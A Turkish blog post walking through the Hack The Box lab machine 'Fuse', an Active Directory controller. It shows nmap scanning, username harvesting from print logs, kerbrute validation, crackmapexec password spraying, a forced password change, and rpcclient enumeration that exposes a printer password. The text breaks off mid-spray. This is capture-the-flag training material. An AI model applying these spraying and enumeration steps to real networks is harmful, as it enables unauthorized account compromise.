{"id":1572,"date":"2021-09-29T14:17:13","date_gmt":"2021-09-29T14:17:13","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1572"},"modified":"2021-09-29T14:17:13","modified_gmt":"2021-09-29T14:17:13","slug":"fuse","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/29\/fuse\/","title":{"rendered":"Fuse"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/256\" title=\"Fuse\">Fuse<\/a> - HTB<\/td>\n<td>Zor<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/7c69c876f496cd729a077277757d219d.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131:<\/p>\n<pre><code class=\"language-sh\">Not shown: 65514 filtered ports                                                                                                                                                                                                               \nPORT      STATE SERVICE      VERSION                                                                                                                                                                                                          \n53\/tcp    open  domain       Simple DNS Plus                                                                                                                                                                                                  \n80\/tcp    open  http         Microsoft IIS httpd 10.0                                                                                                                                                                                         \n| http-methods:                                                                                                                                                                                                                               \n|_  Potentially risky methods: TRACE                                                                                                                                                                                                          \n|_http-server-header: Microsoft-IIS\/10.0                                                                                                                                                                                                      \n|_http-title: Site doesn&#039;t have a title (text\/html).                                                                                                                                                                                          \n88\/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-28 19:33:25Z)                                                                                                                                                   \n135\/tcp   open  msrpc        Microsoft Windows RPC                                                                                                                                                                                            \n139\/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                                                                                                                                                                    \n389\/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)                                                                                                                 \n445\/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)                                                                                                                                           \n464\/tcp   open  kpasswd5?                                                                                                                                                                                                                     \n593\/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0                                                                                                                                                                              \n636\/tcp   open  tcpwrapped                                                                                                                                                                                                                    \n3268\/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)                                                                                                                 \n3269\/tcp  open  tcpwrapped\n5985\/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n9389\/tcp  open  mc-nmf       .NET Message Framing\n49666\/tcp open  msrpc        Microsoft Windows RPC\n49667\/tcp open  msrpc        Microsoft Windows RPC\n49675\/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n49676\/tcp open  msrpc        Microsoft Windows RPC\n49678\/tcp open  msrpc        Microsoft Windows RPC\n49703\/tcp open  msrpc        Microsoft Windows RPC\n49757\/tcp open  msrpc        Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)\nOS CPE: cpe:\/o:microsoft:windows_server_2016 cpe:\/o:microsoft:windows_server_2012:r2 cpe:\/o:microsoft:windows_server_2008:r2 cpe:\/o:microsoft:windows_10:1607\nAggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host: FUSE; OS: Windows; CPE: cpe:\/o:microsoft:windows\n<\/code><\/pre>\n<p>Makinenin bir DC oldu\u011fu anla\u015f\u0131l\u0131yor. Ayr\u0131ca 80. portta bir internet sayfas\u0131 var. PaperCut isimli bir sayfa. Bu sayfaya gitti\u011fimizde farkl\u0131 tariglere ait printer loglar\u0131 oldu\u011funu g\u00f6td\u00fcm ve burdaki kullan\u0131c\u0131 isimlerini kullnarak ilk ba\u015fta aspreroast sald\u0131r\u0131s\u0131 denedim ancak ba\u015far\u0131l\u0131 olamad\u0131m. \u0130\u015fte elde etti\u011fim kullan\u0131c\u0131lar:<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# cat printer_users \npmerton\ntlavel\nsthompson\nbhult\nadministrator\n<\/code><\/pre>\n<p>Bu kullan\u0131c\u0131lardan baz\u0131lar\u0131n\u0131 buldu\u011fum sayfa: <a href=\"http:\/\/fuse.fabricorp.local\/papercut\/logs\/html\/papercut-print-log-2020-06-10.htm\">http:\/\/fuse.fabricorp.local\/papercut\/logs\/html\/papercut-print-log-2020-06-10.htm<\/a><\/p>\n<p>Uzun bir s\u00fcre inceleme yapt\u0131m ancak hi\u00e7 bir\u015fey bulamad\u0131m bunun \u00fczerine smb bruteforce denemesi yapmaya karar verdim. \u0130lk ba\u015fta fastcrack.txt dosyas\u0131n\u0131 denedim anak ba\u015far\u0131l\u0131 olamad\u0131m. Bunun \u00fczerine internet sayfas\u0131ndaki kelimelerden bir wordlist olu\u015fturdum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# cewl -w wordlist --with-numbers -m 6 -d 3 http:\/\/fuse.fabricorp.local\/papercut\/logs\/html\/index.htm\n<\/code><\/pre>\n<p>\u00d6ncesinde kerbrute arac\u0131 ile elde etmi\u015f oldu\u011fum user'lar\u0131nda ger\u00e7ekten var olup olmad\u0131klar\u0131n\u0131 do\u011frulad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# .\/kerbrute_linux_amd64 userenum \/root\/10.10.10.193\/users -d fabricorp.local --dc 10.10.10.193                                                                                                                                         1 \u2a2f\n\n    __             __               __     \n   \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,&lt; \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/                                        \n\nVersion: v1.0.3 (9dad6e1) - 09\/28\/21 - Ronnie Flathers @ropnop\n\n2021\/09\/28 18:25:26 &gt;  Using KDC(s):\n2021\/09\/28 18:25:26 &gt;   10.10.10.193:88\n\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       sthompson@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       pmerton@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       tlavel@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       administrator@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  [+] VALID USERNAME:       bhult@fabricorp.local\n2021\/09\/28 18:25:26 &gt;  Done! Tested 5 usernames (5 valid) in 0.075 seconds\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]                                                                                       \n\u2514\u2500# crackmapexec smb 10.10.10.193 -u users -p wordlist                                                                 \nSMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)                                                                               \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:PaperCut STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LETTER STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:DUPLEX STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:GRAYSCALE STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Logger STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:papercut STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Notepad STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:sthompson STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LONWK019 STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Copies STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Printer STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Document STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Client STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Duplex STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Grayscale STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Software STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Copyright STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Location STATUS_LOGON_FAILURE                                                                                                                                 \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:NotepadLETTER STATUS_LOGON_FAILURE     \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Language STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:NotepadLETTER STATUS_LOGON_FAILURE                                                                                                                    [52\/145]\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Language STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Height STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Refresh STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:printing STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:logging STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:International STATUS_LOGON_FAILURE     \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:pmerton STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Starter STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:bnielson STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:JUMP01 STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:tlavel STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Budget STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Meeting STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Minutes STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LONWK015 STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:backup STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:mountain STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:request STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Fabricorp01 STATUS_LOGON_FAILURE       \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:offsite STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:invocation STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:LAPTOP07 STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:administrator STATUS_LOGON_FAILURE     \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:program STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:additional STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:features STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:please STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Follow STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Twitter STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Forbidden STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Access STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:denied STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:listed STATUS_LOGON_FAILURE                                                                                                                                   \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:available STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:software STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:printers STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:locally STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:attached STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:system STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:consider STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:monitoring STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:servers STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:reporting STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:quotas STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:charging STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:secured STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:advanced STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:management STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:website STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Please STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:report STATUS_LOGON_FAILURE                                                                                                                                   \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:inaccurate STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:support STATUS_LOGON_FAILURE\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:inaccurate STATUS_LOGON_FAILURE                                                                                                                        [0\/145]\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:support STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:developers STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Developer STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:PaperCutDev STATUS_LOGON_FAILURE       \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Server STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:permission STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:directory STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:credentials STATUS_LOGON_FAILURE       \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:supplied STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:pdfLETTER STATUS_LOGON_FAILURE         \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:WordLETTER STATUS_LOGON_FAILURE        \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Untitled STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:PaperCut STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:LETTER STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:DUPLEX STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:GRAYSCALE STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Logger STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:papercut STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Notepad STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:sthompson STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:LONWK019 STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Copies STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Printer STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Document STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Client STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Duplex STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Grayscale STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Software STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Copyright STATUS_LOGON_FAILURE          \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Location STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:NotepadLETTER STATUS_LOGON_FAILURE      \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Language STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Height STATUS_LOGON_FAILURE                                                                                                                                    \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Refresh STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:printing STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:logging STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:International STATUS_LOGON_FAILURE      \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:pmerton STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Starter STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:bnielson STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:JUMP01 STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:tlavel STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Budget STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Meeting STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Minutes STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:LONWK015 STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:backup STATUS_LOGON_FAILURE             \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:mountain STATUS_LOGON_FAILURE           \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:request STATUS_LOGON_FAILURE            \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE <\/code><\/pre>\n<p>En sonunda bir parola tespit ettim.<\/p>\n<pre><code>tlavel:Fabricorp01<\/code><\/pre>\n<p><code>STATUS_PASSWORD_MUST_CHANGE <\/code>dedi\u011fi i\u00e7in parolay\u0131 de\u011fi\u015ftirdim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# smbpasswd -r 10.10.10.193 -U tlavel                                                                            1 \u2a2f\nOld SMB password:\nNew SMB password:\nRetype new SMB password:\nPassword changed for user tlavel on 10.10.10.193.<\/code><\/pre>\n<p>Ancak yapt\u0131\u011f\u0131m testler sonucu i\u00e7eride bir schedule task oldu\u011funu d\u00fc\u015f\u00fcnmeye ba\u015flad\u0131m \u00e7\u00fcnk\u00fc parola s\u00fcrekli s\u0131f\u0131rlan\u0131yordu. H\u0131zl\u0131ca davran\u0131p rpcclient ile bilgi toplamaya\u0131 denedim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt\/ldapdomaindump\/ldap]                                                                                                                                                                                                    \n\u2514\u2500# rpcclient -U &quot;tlavel&quot; -p &#039;Password2&#039; 10.10.10.193                                                             1 \u2a2f  \nEnter WORKGROUP\\tlavel&#039;s password:                                                                                                                                                                                                            \nrpcclient $&gt; enumdomusers                                                                                              \nuser:[Administrator] rid:[0x1f4]                                                                                       \nuser:[Guest] rid:[0x1f5]                                                                                               \nuser:[krbtgt] rid:[0x1f6]                                                                                              \nuser:[DefaultAccount] rid:[0x1f7]                                                                                      \nuser:[svc-print] rid:[0x450]                                                                                           \nuser:[bnielson] rid:[0x451]                                                                                            \nuser:[sthompson] rid:[0x641] \nuser:[tlavel] rid:[0x642]       \nuser:[pmerton] rid:[0x643]\nuser:[svc-scan] rid:[0x645]\nuser:[bhult] rid:[0x1bbd]\nuser:[dandrews] rid:[0x1bbe]\nuser:[mberbatov] rid:[0x1db1]\nuser:[astein] rid:[0x1db2]\nuser:[dmuir] rid:[0x1db3]\nrpcclient $&gt; queryuser  0x450\n        User Name   :   svc-print\n        Full Name   :                                                                                                  \n        Home Drive  :                                                                                                  \n        Dir Drive   :                                                                                                  \n        Profile Path:                                                                                                  \n        Logon Script:                                                                                                  \n        Description :                                                                                                  \n        Workstations:      \n        Comment     :        \n        Remote Dial :        \n        Logon Time               :      Tue, 28 Sep 2021 19:08:01 EDT\n        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST\n        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST\n        Password last set Time   :      Sat, 30 May 2020 20:27:08 EDT\n        Password can change Time :      Sun, 31 May 2020 20:27:08 EDT\n        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT\n        unknown_2[0..31]...\n        user_rid :      0x450\n        group_rid:      0x201\n        acb_info :      0x00000210    \n        fields_present: 0x00ffffff                                                                                                                                                                                                            \n        logon_divs:     168\n        bad_password_count:     0x00000000\n        logon_count:    0x00000077\n        bad_password_count:     0x00000000                                                                                                                                                                                             [0\/125]\n        logon_count:    0x00000077       \n        padding1[0..7]...                                                                                                                                                                                                                     \n        logon_hrs[0..21]...               \nrpcclient $&gt; querydispinfo                                                                                             \nindex: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer\/domain                                                                                                  \nindex: 0x109c RID: 0x1db2 acb: 0x00000210 Account: astein       Name: (null)    Desc: (null)                           \nindex: 0x1099 RID: 0x1bbd acb: 0x00020010 Account: bhult        Name: (null)    Desc: (null)                           \nindex: 0x1092 RID: 0x451 acb: 0x00020010 Account: bnielson      Name: (null)    Desc: (null)                           \nindex: 0x109a RID: 0x1bbe acb: 0x00000211 Account: dandrews     Name: (null)    Desc: (null)                          \nindex: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.                                                                                                                   \nindex: 0x109d RID: 0x1db3 acb: 0x00000210 Account: dmuir        Name: (null)    Desc: (null)                           \nindex: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer\/domain                                                                                                        \nindex: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account  \nindex: 0x109b RID: 0x1db1 acb: 0x00000210 Account: mberbatov    Name: (null)    Desc: (null)                           \nindex: 0x1096 RID: 0x643 acb: 0x00000210 Account: pmerton       Name: (null)    Desc: (null)                           \nindex: 0x1094 RID: 0x641 acb: 0x00000210 Account: sthompson     Name: (null)    Desc: (null)                           \nindex: 0x1091 RID: 0x450 acb: 0x00000210 Account: svc-print     Name: (null)    Desc: (null)                           \nindex: 0x1098 RID: 0x645 acb: 0x00000210 Account: svc-scan      Name: (null)    Desc: (null)                           \nindex: 0x1095 RID: 0x642 acb: 0x00020010 Account: tlavel        Name: (null)    Desc: (null)                           \nrpcclient $&gt; queryuser  0x645\n        User Name   :   svc-scan\n        Full Name   :     \n        Home Drive  :      \n        Dir Drive   :    \n        Profile Path:       \n        Logon Script:        \n        Description :     \n        Workstations:    \n        Comment     :        \n        Remote Dial :            \n        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST                                                  \n        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST                                                  \n        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST                                                  \n        Password last set Time   :      Sat, 30 May 2020 20:27:31 EDT                                                  \n        Password can change Time :      Sun, 31 May 2020 20:27:31 EDT                                                  \n        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT                                                 \n        unknown_2[0..31]...\n        user_rid :      0x645\n        group_rid:      0x201\n        acb_info :      0x00000210                                                                                     \n        fields_present: 0x00ffffff                                                                                     \n        logon_divs:     168                                                                                            \n        bad_password_count:     0x00000000                                                                             \n        logon_count:    0x00000000                                                                                     \n        padding1[0..7]...                                                                                              \n        logon_hrs[0..21]...\nrpcclient $&gt; enumprinters    \n        flags:[0x800000]     \n        name:[\\\\10.10.10.193\\HP-MFT01]\n        description:[\\\\10.10.10.193\\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]                                                                                                               \n        comment:[]         \n<\/code><\/pre>\n<p>G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere <strong>$fab@s3Rv1ce$1<\/strong> \u015felinde bir parola elde ettik. Bu parola\u0131 b\u00fct\u00fcn kullan\u0131c\u0131lara denedim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# cat users                                             \nAdministrator\nGuest\nkrbtgt\nDefaultAccount\nsvc-print\nbnielson\nsthompson\ntlavel\npmerton\nsvc-scan\nbhult\ndandrews\nmberbatov\nastein\ndmuir\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# crackmapexec smb 10.10.10.193 -u users -p &#039;$fab@s3Rv1ce$1&#039;                  \nSMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)\nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\Administrator:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\Guest:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    